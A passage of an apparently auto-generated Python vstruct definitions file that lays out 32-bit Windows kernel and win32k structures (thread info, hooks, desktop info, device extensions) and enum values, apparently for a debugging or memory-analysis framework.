D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED27 = 177
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED28 = 178
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED29 = 179
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED30 = 180
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED31 = 181
D3DDDIFORMAT.D3DDDIFMT_DXVACOMPBUFFER_MAX = 181
D3DDDIFORMAT.D3DDDIFMT_BINARYBUFFER = 199
D3DDDIFORMAT.D3DDDIFMT_FORCE_UINT = 2147483647
D3DKMDT_MONITOR_TIMING_TYPE = v_enum()
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_UNINITIALIZED = 0
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_ESTABLISHED = 1
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_STANDARD = 2
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_EXTRASTANDARD = 3
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_DETAILED = 4
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_DEFAULTMONITORPROFILE = 5
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_DRIVER = 6
D3DKMDT_MONITOR_TIMING_TYPE.D3DKMDT_MTT_MAXVALID = 6
MEMORY_CACHING_TYPE_ORIG = v_enum()
MEMORY_CACHING_TYPE_ORIG.MmFrameBufferCached = 2
DEVICE_TEXT_TYPE = v_enum()
DEVICE_TEXT_TYPE.DeviceTextDescription = 0
DEVICE_TEXT_TYPE.DeviceTextLocationInformation = 1
POWER_ACTION = v_enum()
POWER_ACTION.PowerActionNone = 0
POWER_ACTION.PowerActionReserved = 1
POWER_ACTION.PowerActionSleep = 2
POWER_ACTION.PowerActionHibernate = 3
POWER_ACTION.PowerActionShutdown = 4
POWER_ACTION.PowerActionShutdownReset = 5
POWER_ACTION.PowerActionShutdownOff = 6
POWER_ACTION.PowerActionWarmEject = 7
D3DKMDT_MONITOR_DESCRIPTOR_TYPE = v_enum()
D3DKMDT_MONITOR_DESCRIPTOR_TYPE.D3DKMDT_MDT_UNINITIALIZED = 0
D3DKMDT_MONITOR_DESCRIPTOR_TYPE.D3DKMDT_MDT_VESA_EDID_V1_BASEBLOCK = 1
D3DKMDT_MONITOR_DESCRIPTOR_TYPE.D3DKMDT_MDT_VESA_EDID_V1_BLOCKMAP = 2
D3DKMDT_MONITOR_DESCRIPTOR_TYPE.D3DKMDT_MDT_OTHER = 255
SM_RANGE_TYPES = v_enum()
SM_RANGE_TYPES.SmRangeSharedInfo = 0
SM_RANGE_TYPES.SmRangeNonSharedInfo = 1
SM_RANGE_TYPES.SmRangeBool = 2
WINDOWCOMPOSITIONATTRIB = v_enum()
WINDOWCOMPOSITIONATTRIB.WCA_UNDEFINED = 0
WINDOWCOMPOSITIONATTRIB.WCA_NCRENDERING_ENABLED = 1
WINDOWCOMPOSITIONATTRIB.WCA_NCRENDERING_POLICY = 2
WINDOWCOMPOSITIONATTRIB.WCA_TRANSITIONS_FORCEDISABLED = 3
WINDOWCOMPOSITIONATTRIB.WCA_ALLOW_NCPAINT = 4
WINDOWCOMPOSITIONATTRIB.WCA_CAPTION_BUTTON_BOUNDS = 5
WINDOWCOMPOSITIONATTRIB.WCA_NONCLIENT_RTL_LAYOUT = 6
WINDOWCOMPOSITIONATTRIB.WCA_FORCE_ICONIC_REPRESENTATION = 7
WINDOWCOMPOSITIONATTRIB.WCA_FLIP3D_POLICY = 8
WINDOWCOMPOSITIONATTRIB.WCA_EXTENDED_FRAME_BOUNDS = 9
WINDOWCOMPOSITIONATTRIB.WCA_HAS_ICONIC_BITMAP = 10
WINDOWCOMPOSITIONATTRIB.WCA_THEME_ATTRIBUTES = 11
WINDOWCOMPOSITIONATTRIB.WCA_NCRENDERING_EXILED = 12
WINDOWCOMPOSITIONATTRIB.WCA_NCADORNMENTINFO = 13
WINDOWCOMPOSITIONATTRIB.WCA_EXCLUDED_FROM_LIVEPREVIEW = 14
WINDOWCOMPOSITIONATTRIB.WCA_VIDEO_OVERLAY_ACTIVE = 15
WINDOWCOMPOSITIONATTRIB.WCA_FORCE_ACTIVEWINDOW_APPEARANCE = 16
WINDOWCOMPOSITIONATTRIB.WCA_DISALLOW_PEEK = 17
WINDOWCOMPOSITIONATTRIB.WCA_LAST = 18
class tagTOUCHINPUTINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.head = THROBJHEAD()
self.dwcInputs = v_uint32()
self.uFlags = v_uint32()
self.TouchInput = vstruct.VArray([ tagTOUCHINPUT() for i in xrange(1) ])
class tagHOOK(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.head = THRDESKHEAD()
self.phkNext = v_ptr32()
self.iHook = v_uint32()
self.offPfn = v_uint32()
self.flags = v_uint32()
self.ihmod = v_uint32()
self.ptiHooked = v_ptr32()
self.rpdesk = v_ptr32()
self.nTimeout = v_uint32()
class VK_TO_WCHAR_TABLE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pVkToWchars = v_ptr32()
self.nModifications = v_uint8()
self.cbSize = v_uint8()
self._pad0008 = v_bytes(size=2)
class D3DKMDT_2DREGION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cx = v_uint32()
self.cy = v_uint32()
class DEADKEY(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.dwBoth = v_uint32()
self.wchComposed = v_uint16()
self.uFlags = v_uint16()
class CURDIR(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.DosPath = UNICODE_STRING()
self.Handle = v_ptr32()
class tagPROPLIST(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cEntries = v_uint32()
self.iFirstFree = v_uint32()
self.aprop = vstruct.VArray([ tagPROP() for i in xrange(1) ])
class tagDESKTOPINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pvDesktopBase = v_ptr32()
self.pvDesktopLimit = v_ptr32()
self.spwnd = v_ptr32()
self.fsHooks = v_uint32()
self.aphkStart = vstruct.VArray([ v_ptr32() for i in xrange(16) ])
self.spwndShell = v_ptr32()
self.ppiShellProcess = v_ptr32()
self.spwndBkGnd = v_ptr32()
self.spwndTaskman = v_ptr32()
self.spwndProgman = v_ptr32()
self.pvwplShellHook = v_ptr32()
self.cntMBox = v_uint32()
self.spwndGestureEngine = v_ptr32()
self.pvwplMessagePPHandler = v_ptr32()
self.fComposited = v_uint32()
class _unnamed_12849(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.PowerSequence = v_ptr32()
class WHEA_ERROR_RECORD_SECTION_DESCRIPTOR(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SectionOffset = v_uint32()
self.SectionLength = v_uint32()
self.Revision = WHEA_REVISION()
self.ValidBits = WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_VALIDBITS()
self.Reserved = v_uint8()
self.Flags = WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_FLAGS()
self.SectionType = GUID()
self.FRUId = GUID()
self.SectionSeverity = v_uint32()
self.FRUText = vstruct.VArray([ v_uint8() for i in xrange(20) ])
class VK_TO_FUNCTION_TABLE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Vk = v_uint8()
self.NLSFEProcType = v_uint8()
self.NLSFEProcCurrent = v_uint8()
self.NLSFEProcSwitch = v_uint8()
self.NLSFEProc = vstruct.VArray([ VK_FUNCTION_PARAM() for i in xrange(8) ])
self.NLSFEProcAlt = vstruct.VArray([ VK_FUNCTION_PARAM() for i in xrange(8) ])
class tagTHREADINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pEThread = v_ptr32()
self.RefCount = v_uint32()
self.ptlW32 = v_ptr32()
self.pgdiDcattr = v_ptr32()
self.pgdiBrushAttr = v_ptr32()
self.pUMPDObjs = v_ptr32()
self.pUMPDHeap = v_ptr32()
self.pUMPDObj = v_ptr32()
self.GdiTmpTgoList = LIST_ENTRY()
self.pRBRecursionCount = v_uint32()
self.pNonRBRecursionCount = v_uint32()
self.tlSpriteState = TLSPRITESTATE()
self.pSpriteState = v_ptr32()
self.pDevHTInfo = v_ptr32()
self.ulDevHTInfoUniqueness = v_uint32()
self.pdcoAA = v_ptr32()
self.pdcoRender = v_ptr32()
self.pdcoSrc = v_ptr32()
self.bEnableEngUpdateDeviceSurface = v_uint8()
self.bIncludeSprites = v_uint8()
self._pad00ac = v_bytes(size=2)
self.ulWindowSystemRendering = v_uint32()
self.iVisRgnUniqueness = v_uint32()
self.ptl = v_ptr32()
self.ppi = v_ptr32()
self.pq = v_ptr32()
self.spklActive = v_ptr32()
self.pcti = v_ptr32()
self.rpdesk = v_ptr32()
self.pDeskInfo = v_ptr32()
self.ulClientDelta = v_uint32()
self.pClientInfo = v_ptr32()
self.TIF_flags = v_uint32()
self.pstrAppName = v_ptr32()
self.psmsSent = v_ptr32()
self.psmsCurrent = v_ptr32()
self.psmsReceiveList = v_ptr32()
self.timeLast = v_uint32()
self.idLast = v_uint32()
self.exitCode = v_uint32()
self.hdesk = v_ptr32()
self.cPaintsReady = v_uint32()
self.cTimersReady = v_uint32()
self.pMenuState = v_ptr32()
self.ptdb = v_ptr32()
self.psiiList = v_ptr32()
self.dwExpWinVer = v_uint32()
self.dwCompatFlags = v_uint32()
self.dwCompatFlags2 = v_uint32()
self._pad0120 = v_bytes(size=4)
self.pqAttach = v_ptr32()
self.ptiSibling = v_ptr32()
self.pmsd = v_ptr32()
self.fsHooks = v_uint32()
self.sphkCurrent = v_ptr32()
self.lParamHkCurrent = v_uint32()
self.wParamHkCurrent = v_uint32()
self.pSBTrack = v_ptr32()
self.hEventQueueClient = v_ptr32()
self.pEventQueueServer = v_ptr32()
self.PtiLink = LIST_ENTRY()
self.iCursorLevel = v_uint32()
self.ptLast = tagPOINT()
self.ptLastReal = tagPOINT()
self.spwndDefaultIme = v_ptr32()
self.spDefaultImc = v_ptr32()
self.hklPrev = v_ptr32()
self.cEnterCount = v_uint32()
self.mlPost = tagMLIST()
self.fsChangeBitsRemoved = v_uint16()
self.wchInjected = v_uint16()
self.fsReserveKeys = v_uint32()
self.apEvent = v_ptr32()
self.amdesk = v_uint32()
self.cWindows = v_uint32()
self.cVisWindows = v_uint32()
self.aphkStart = vstruct.VArray([ v_ptr32() for i in xrange(16) ])
self.cti = tagCLIENTTHREADINFO()
self.hPrevHidData = v_ptr32()
self.hTouchInputCurrent = v_ptr32()
self.hGestureInfoCurrent = v_ptr32()
self.MsgPPInfo = tagMSGPPINFO()
self.cNestedStableVisRgn = v_uint32()
self.readyHead = LIST_ENTRY()
self.fSpecialInitialization = v_uint32()
class _unnamed_12843(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.PowerState = v_uint32()
class D3DKMDT_VIDEO_SIGNAL_INFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.VideoStandard = v_uint32()
self.TotalSize = D3DKMDT_2DREGION()
self.ActiveSize = D3DKMDT_2DREGION()
self.VSyncFreq = D3DDDI_RATIONAL()
self.HSyncFreq = D3DDDI_RATIONAL()
self.PixelRate = v_uint32()
self.ScanLineOrdering = v_uint32()
class CM_PARTIAL_RESOURCE_LIST(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Version = v_uint16()
self.Revision = v_uint16()
self.Count = v_uint32()
self.PartialDescriptors = vstruct.VArray([ CM_PARTIAL_RESOURCE_DESCRIPTOR() for i in xrange(1) ])
class HGESTUREINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class DEVICE_CAPABILITIES(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Size = v_uint16()
self.Version = v_uint16()
self.DeviceD1 = v_uint32()
self.Address = v_uint32()
self.UINumber = v_uint32()
self.DeviceState = vstruct.VArray([ DEVICE_POWER_STATE() for i in xrange(7) ])
self.SystemWake = v_uint32()
self.DeviceWake = v_uint32()
self.D1Latency = v_uint32()
self.D2Latency = v_uint32()
self.D3Latency = v_uint32()
class TP_DIRECT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Callback = v_ptr32()
self.NumaNode = v_uint32()
self.IdealProcessor = v_uint8()
self._pad000c = v_bytes(size=3)
class tagMONITOR(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.head = HEAD()
self.pMonitorNext = v_ptr32()
self.dwMONFlags = v_uint32()
self.rcMonitorReal = tagRECT()
self.rcWorkReal = tagRECT()
self.hrgnMonitorReal = v_ptr32()
self.Spare0 = v_uint16()
self.cWndStack = v_uint16()
self.hDev = v_ptr32()
self.hDevReal = v_ptr32()
self.DockTargets = vstruct.VArray([ v_uint32() for i in xrange(7) ])
self.Flink = v_ptr32()
self.Blink = v_ptr32()
class _unnamed_12410(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.UserApcRoutine = v_ptr32()
self.UserApcContext = v_ptr32()
class _unnamed_12558(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SecurityContext = v_ptr32()
self.Options = v_uint32()
self.FileAttributes = v_uint16()
self.ShareAccess = v_uint16()
self.EaLength = v_uint32()
class _unnamed_12735(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint32()
class KPROCESS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class DEVICE_OBJECT_POWER_EXTENSION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class tagTEXTMETRICW(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.tmHeight = v_uint32()
self.tmAscent = v_uint32()
self.tmDescent = v_uint32()
self.tmInternalLeading = v_uint32()
self.tmExternalLeading = v_uint32()
self.tmAveCharWidth = v_uint32()
self.tmMaxCharWidth = v_uint32()
self.tmWeight = v_uint32()
self.tmOverhang = v_uint32()
self.tmDigitizedAspectX = v_uint32()
self.tmDigitizedAspectY = v_uint32()
self.tmFirstChar = v_uint16()
self.tmLastChar = v_uint16()
self.tmDefaultChar = v_uint16()
self.tmBreakChar = v_uint16()
self.tmItalic = v_uint8()
self.tmUnderlined = v_uint8()
self.tmStruckOut = v_uint8()
self.tmPitchAndFamily = v_uint8()
self.tmCharSet = v_uint8()
self._pad003c = v_bytes(size=3)
class WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_FLAGS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Primary = v_uint32()
class TP_CALLBACK_ENVIRON_V3(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Version = v_uint32()
self.Pool = v_ptr32()
self.CleanupGroup = v_ptr32()
self.CleanupGroupCancelCallback = v_ptr32()
self.RaceDll = v_ptr32()
self.ActivationContext = v_ptr32()
self.FinalizationCallback = v_ptr32()
self.u = _unnamed_11730()
self.CallbackPriority = v_uint32()
self.Size = v_uint32()
class HDESK(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class RTL_ACTIVATION_CONTEXT_STACK_FRAME(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Previous = v_ptr32()
self.ActivationContext = v_ptr32()
self.Flags = v_uint32()
class OBJECT_HANDLE_INFORMATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.HandleAttributes = v_uint32()
self.GrantedAccess = v_uint32()
class XSTATE_CONFIGURATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.EnabledFeatures = v_uint64()
self.Size = v_uint32()
self.OptimizedSave = v_uint32()
self.Features = vstruct.VArray([ XSTATE_FEATURE() for i in xrange(64) ])
class RTL_AVL_TABLE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.BalancedRoot = RTL_BALANCED_LINKS()
self.OrderedPointer = v_ptr32()
self.WhichOrderedElement = v_uint32()
self.NumberGenericTableElements = v_uint32()
self.DepthOfTree = v_uint32()
self.RestartKey = v_ptr32()
self.DeleteCount = v_uint32()
self.CompareRoutine = v_ptr32()
self.AllocateRoutine = v_ptr32()
self.FreeRoutine = v_ptr32()
self.TableContext = v_ptr32()
class tagHID_TLC_INFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.link = LIST_ENTRY()
self.usUsagePage = v_uint16()
self.usUsage = v_uint16()
self.cDevices = v_uint32()
self.cDirectRequest = v_uint32()
self.cUsagePageRequest = v_uint32()
self.cExcludeRequest = v_uint32()
self.cExcludeOrphaned = v_uint32()
class WHEA_ERROR_PACKET_V2(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Signature = v_uint32()
self.Version = v_uint32()
self.Length = v_uint32()
self.Flags = WHEA_ERROR_PACKET_FLAGS()
self.ErrorType = v_uint32()
self.ErrorSeverity = v_uint32()
self.ErrorSourceId = v_uint32()
self.ErrorSourceType = v_uint32()
self.NotifyType = GUID()
self.Context = v_uint64()
self.DataFormat = v_uint32()
self.Reserved1 = v_uint32()
self.DataOffset = v_uint32()
self.DataLength = v_uint32()
self.PshedDataOffset = v_uint32()
self.PshedDataLength = v_uint32()
class DXGK_DIAG_HEADER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint32()
self.Size = v_uint32()
self.LogTimestamp = v_uint64()
self.ProcessName = vstruct.VArray([ v_uint8() for i in xrange(16) ])
self.ThreadId = v_uint64()
self.Index = v_uint32()
self.WdLogIdx = v_uint32()
class DMM_VIDPNPATHANDTARGETMODESET_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.PathInfo = D3DKMDT_VIDPN_PRESENT_PATH()
self.TargetModeSet = DMM_VIDPNTARGETMODESET_SERIALIZATION()
class _unnamed_12744(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.InterfaceType = v_ptr32()
self.Size = v_uint16()
self.Version = v_uint16()
self.Interface = v_ptr32()
self.InterfaceSpecificData = v_ptr32()
class VK_TO_WCHARS1(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.VirtualKey = v_uint8()
self.Attributes = v_uint8()
self.wch = vstruct.VArray([ v_uint16() for i in xrange(1) ])
class OWNER_ENTRY(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.OwnerThread = v_uint32()
self.IoPriorityBoosted = v_uint32()
class DEVOBJ_EXTENSION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint16()
self.Size = v_uint16()
self.DeviceObject = v_ptr32()
self.PowerFlags = v_uint32()
self.Dope = v_ptr32()
self.ExtensionFlags = v_uint32()
self.DeviceNode = v_ptr32()
self.AttachedTo = v_ptr32()
self.StartIoCount = v_uint32()
self.StartIoKey = v_uint32()
self.StartIoFlags = v_uint32()
self.Vpb = v_ptr32()
self.DependentList = LIST_ENTRY()
self.ProviderList = LIST_ENTRY()
class D3DKMDT_MONITOR_FREQUENCY_RANGE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Origin = v_uint32()
self.RangeLimits = D3DKMDT_FREQUENCY_RANGE()
self.ConstraintType = v_uint32()
self.Constraint = _unnamed_13453()
class tagQ(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.mlInput = tagMLIST()
self.ptiSysLock = v_ptr32()
self.idSysLock = v_uint32()
self.idSysPeek = v_uint32()
self.ptiMouse = v_ptr32()
self.ptiKeyboard = v_ptr32()
self.spwndCapture = v_ptr32()
self.spwndFocus = v_ptr32()
self.spwndActive = v_ptr32()
self.spwndActivePrev = v_ptr32()
self.codeCapture = v_uint32()
self.msgDblClk = v_uint32()
self.xbtnDblClk = v_uint16()
self._pad003c = v_bytes(size=2)
self.timeDblClk = v_uint32()
self.hwndDblClk = v_ptr32()
self.ptDblClk = tagPOINT()
self.ptMouseMove = tagPOINT()
self.afKeyRecentDown = vstruct.VArray([ v_uint8() for i in xrange(32) ])
self.afKeyState = vstruct.VArray([ v_uint8() for i in xrange(64) ])
self.caret = tagCARET()
self.spcurCurrent = v_ptr32()
self.iCursorLevel = v_uint32()
self.QF_flags = v_uint32()
self.cThreads = v_uint16()
self.cLockCount = v_uint16()
self.msgJournal = v_uint32()
self.ExtraInfo = v_uint32()
self.ulEtwReserved1 = v_uint32()
class tagCLS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pclsNext = v_ptr32()
self.atomClassName = v_uint16()
self.atomNVClassName = v_uint16()
self.fnid = v_uint16()
self._pad000c = v_bytes(size=2)
self.rpdeskParent = v_ptr32()
self.pdce = v_ptr32()
self.hTaskWow = v_uint16()
self.CSF_flags = v_uint16()
self.lpszClientAnsiMenuName = v_ptr32()
self.lpszClientUnicodeMenuName = v_ptr32()
self.spcpdFirst = v_ptr32()
self.pclsBase = v_ptr32()
self.pclsClone = v_ptr32()
self.cWndReferenceCount = v_uint32()
self.style = v_uint32()
self.lpfnWndProc = v_ptr32()
self.cbclsExtra = v_uint32()
self.cbwndExtra = v_uint32()
self.hModule = v_ptr32()
self.spicn = v_ptr32()
self.spcur = v_ptr32()
self.hbrBackground = v_ptr32()
self.lpszMenuName = v_ptr32()
self.lpszAnsiClassName = v_ptr32()
self.spicnSm = v_ptr32()
class CALLPROCDATA(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.head = PROCDESKHEAD()
self.spcpdNext = v_ptr32()
self.pfnClientPrevious = v_uint32()
self.wType = v_uint16()
self._pad0020 = v_bytes(size=2)
class WM_VALUES_STRINGS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pszName = v_ptr32()
self.fInternal = v_uint8()
self.fDefined = v_uint8()
self._pad0008 = v_bytes(size=2)
class _unnamed_16080(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Channel = v_uint32()
self.Port = v_uint32()
self.Reserved1 = v_uint32()
class HIMC(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class _unnamed_16086(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Start = v_uint32()
self.Length = v_uint32()
self.Reserved = v_uint32()
class LARGE_UNICODE_STRING(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint32()
self.MaximumLength = v_uint32()
self.Buffer = v_ptr32()
class ACCESS_STATE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.OperationID = LUID()
self.SecurityEvaluated = v_uint8()
self.GenerateAudit = v_uint8()
self.GenerateOnClose = v_uint8()
self.PrivilegesAllocated = v_uint8()
self.Flags = v_uint32()
self.RemainingDesiredAccess = v_uint32()
self.PreviouslyGrantedAccess = v_uint32()
self.OriginalDesiredAccess = v_uint32()
self.SubjectSecurityContext = SECURITY_SUBJECT_CONTEXT()
self.SecurityDescriptor = v_ptr32()
self.AuxData = v_ptr32()
self.Privileges = _unnamed_13037()
self.AuditPrivileges = v_uint8()
self._pad0064 = v_bytes(size=3)
self.ObjectName = UNICODE_STRING()
self.ObjectTypeName = UNICODE_STRING()
class TP_CALLBACK_INSTANCE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class tagRECT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.left = v_uint32()
self.top = v_uint32()
self.right = v_uint32()
self.bottom = v_uint32()
class GDI_TEB_BATCH(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Offset = v_uint32()
self.HDC = v_uint32()
self.Buffer = vstruct.VArray([ v_uint32() for i in xrange(310) ])
class _unnamed_16100(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Start = LARGE_INTEGER()
self.Length64 = v_uint32()
class ECP_LIST(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class tagMENUSTATE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pGlobalPopupMenu = v_ptr32()
self.fMenuStarted = v_uint32()
self.ptMouseLast = tagPOINT()
self.mnFocus = v_uint32()
self.cmdLast = v_uint32()
self.ptiMenuStateOwner = v_ptr32()
self.dwLockCount = v_uint32()
self.pmnsPrev = v_ptr32()
self.ptButtonDown = tagPOINT()
self.uButtonDownHitArea = v_uint32()
self.uButtonDownIndex = v_uint32()
self.vkButtonDown = v_uint32()
self.uDraggingHitArea = v_uint32()
self.uDraggingIndex = v_uint32()
self.uDraggingFlags = v_uint32()
self.hdcWndAni = v_ptr32()
self.dwAniStartTime = v_uint32()
self.ixAni = v_uint32()
self.iyAni = v_uint32()
self.cxAni = v_uint32()
self.cyAni = v_uint32()
self.hbmAni = v_ptr32()
self.hdcAni = v_ptr32()
class SECTION_OBJECT_POINTERS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.DataSectionObject = v_ptr32()
self.SharedCacheMap = v_ptr32()
self.ImageSectionObject = v_ptr32()
class MDL(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Next = v_ptr32()
self.Size = v_uint16()
self.MdlFlags = v_uint16()
self.Process = v_ptr32()
self.MappedSystemVa = v_ptr32()
self.StartVa = v_ptr32()
self.ByteCount = v_uint32()
self.ByteOffset = v_uint32()
class tagMSGPPINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.dwIndexMsgPP = v_uint32()
class VWPLELEMENT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.DataOrTag = v_uint32()
self.pwnd = v_ptr32()
class IO_TIMER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class VSC_VK(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Vsc = v_uint8()
self._pad0002 = v_bytes(size=1)
self.Vk = v_uint16()
class WHEA_REVISION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.MinorRevision = v_uint8()
self.MajorRevision = v_uint8()
class MAGNIFICATION_INPUT_TRANSFORM(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.rcSource = tagRECT()
self.rcScreen = tagRECT()
self.ptiMagThreadInfo = v_ptr32()
self.magFactorX = v_uint32()
self.magFactorY = v_uint32()
class TP_CLEANUP_GROUP(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class DMM_VIDPNPATHANDTARGETMODE_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.PathInfo = D3DKMDT_VIDPN_PRESENT_PATH()
self.TargetMode = D3DKMDT_VIDPN_TARGET_MODE()
class D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_SUPPORT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.NoProtection = v_uint32()
class D3DDDI_DXGI_RGB(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Red = v_uint32()
self.Green = v_uint32()
self.Blue = v_uint32()
class OBJECT_TYPE_INITIALIZER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint16()
self.ObjectTypeFlags = v_uint8()
self._pad0004 = v_bytes(size=1)
self.ObjectTypeCode = v_uint32()
self.InvalidAttributes = v_uint32()
self.GenericMapping = GENERIC_MAPPING()
self.ValidAccessMask = v_uint32()
self.RetainAccess = v_uint32()
self.PoolType = v_uint32()
self.DefaultPagedPoolCharge = v_uint32()
self.DefaultNonPagedPoolCharge = v_uint32()
self.DumpProcedure = v_ptr32()
self.OpenProcedure = v_ptr32()
self.CloseProcedure = v_ptr32()
self.DeleteProcedure = v_ptr32()
self.ParseProcedure = v_ptr32()
self.SecurityProcedure = v_ptr32()
self.QueryNameProcedure = v_ptr32()
self.OkayToCloseProcedure = v_ptr32()
class MOVESIZEDATA(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.spwnd = v_ptr32()
self.rcDrag = tagRECT()
self.rcDragCursor = tagRECT()
self.rcPreview = tagRECT()
self.rcPreviewCursor = tagRECT()
self.rcParent = tagRECT()
self.ptMinTrack = tagPOINT()
self.ptMaxTrack = tagPOINT()
self.rcWindow = tagRECT()
self.rcNormalStartCheckPt = tagRECT()
self.dxMouse = v_uint32()
self.dyMouse = v_uint32()
self.cmd = v_uint32()
self.impx = v_uint32()
self.impy = v_uint32()
self.ptRestore = tagPOINT()
self.Flags = v_uint32()
self.pStartMonitorCurrentHitTarget = v_ptr32()
self.StartCurrentHitTarget = v_uint32()
self.pMonitorCurrentHitTarget = v_ptr32()
self.CurrentHitTarget = v_uint32()
self.MoveRectStyle = v_uint32()
self.ptHitWindowRelative = tagPOINT()
self.ptStartHitWindowRelative = tagPOINT()
self.ptLastTrack = tagPOINT()
self.ulCountDragOutOfTopTarget = v_uint32()
self.ulCountDragOutOfLeftRightTarget = v_uint32()
self.ulCountSizeOutOfTopBottomTarget = v_uint32()
class SCSI_REQUEST_BLOCK(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class _unnamed_16620(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length64 = v_uint32()
self.Alignment64 = v_uint32()
self.MinimumAddress = LARGE_INTEGER()
self.MaximumAddress = LARGE_INTEGER()
